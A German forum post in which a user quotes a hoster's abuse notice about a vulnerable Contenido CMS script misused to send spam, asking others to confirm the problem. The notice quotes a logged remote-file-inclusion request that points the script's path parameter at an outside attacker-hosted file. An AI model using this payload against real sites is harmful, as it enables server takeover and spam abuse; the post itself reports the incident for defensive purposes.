Ich habe heute diese Mail von einem Hoster eines Kundenprojektes bekommen ...
Kann mir jemand das Problem bestätigen?
lgSehr geehrte Damen und Herren,
Bitte an den zuständigen Webmaster/Webdesigner weiterleiten!
Wir wurden informiert, dass ein Script, dass sich auf Ihrem Webhost befindet, von unbefugten Dritten missbraucht wird, um Spam zu verbreiten.
Durch diesen Missbrauch wurde unsere Webhost-Plattform - die neben
Ihrer Webpräsenz auch Internetpräsenzen anderer Kunden anbietet - derart in Anspruch genommen, sodass die Performance und Stabilität der Plattform darunter gelitten haben.
Die betroffene Datei:
/www/home/contenido/includes/include.tpl_subnav.php?cfg
Begründung:
Diese Datei wird benutzt, um über Drittadressen Spam zu versenden, als eines von vielen Beispielen:
POST
//contenido/includes/include.tpl_subnav.php?cfg[path][contenido]=http://h1.ripway.com/hacker2007/inbox.txt?HTTP/1.0"
Weitere Einträge können Sie aus den Logdateien, die Sie im Verzeichnis /www/log/ befindet, entnehmen.
Wir mussten daher dieses Script deaktivieren.
Bitte achten Sie bei der Verwendung von Scripts immer darauf, ob es möglicherweise eine neuere Variante davon gibt - man muss immer davon ausgehen:
a.) dass das eingesetzte Script möglicherweise Sicherheitslücken aufweisen könnte, und
b.) dass es immer potentielle Angreifer, die eine Sicherheitslücke ausnutzen wollen, gibt.
Wir sind im Sinne der Sicherheit natürlich bemüht, alle notwendigen Massnahmen einzuleiten, jedoch liegt die Absicherung eines selbstinstallierten Scripts ausschliesslich in der Zuständigkeit des Kunden bzw. des zuständigken Webdesigners.
...
Marcus